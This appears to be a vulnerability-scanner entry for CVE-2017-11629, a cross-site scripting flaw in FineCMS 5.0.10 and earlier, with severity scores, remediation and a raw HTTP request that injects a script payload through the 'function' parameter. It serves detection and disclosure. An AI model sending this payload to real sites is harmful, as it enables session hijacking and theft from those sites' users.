| Title | FineCMS <=5.0.10 - Cross-Site Scripting |
|---|---|
| Author | ritikchaddha |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. |
| Remediation | Upgrade to the latest version of FineCMS (>=5.0.11) which includes a fix for this vulnerability. |
| CVSS Score | 6.1 |
| EPSS Score | 0.00588 |
| CVE ID | CVE-2017-11629 |
| CWE ID | CWE-79 |
| Tags | cve cve2017 xss finecms vuln |
FineCMS through 5.0.10 contains a cross-site scripting vulnerability in controllers/api.php via the function parameter in a c=api&m=data2 request.
GET /index.php?c=api&m=data2&function=%3Cscript%3Ealert(document.domain)%3C/script%3Ep&format=php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2017/CVE-2017-11629.yaml
🦈 Packet Capture: ⬇️ Download cve-2017-11629.pcap
N/AN/A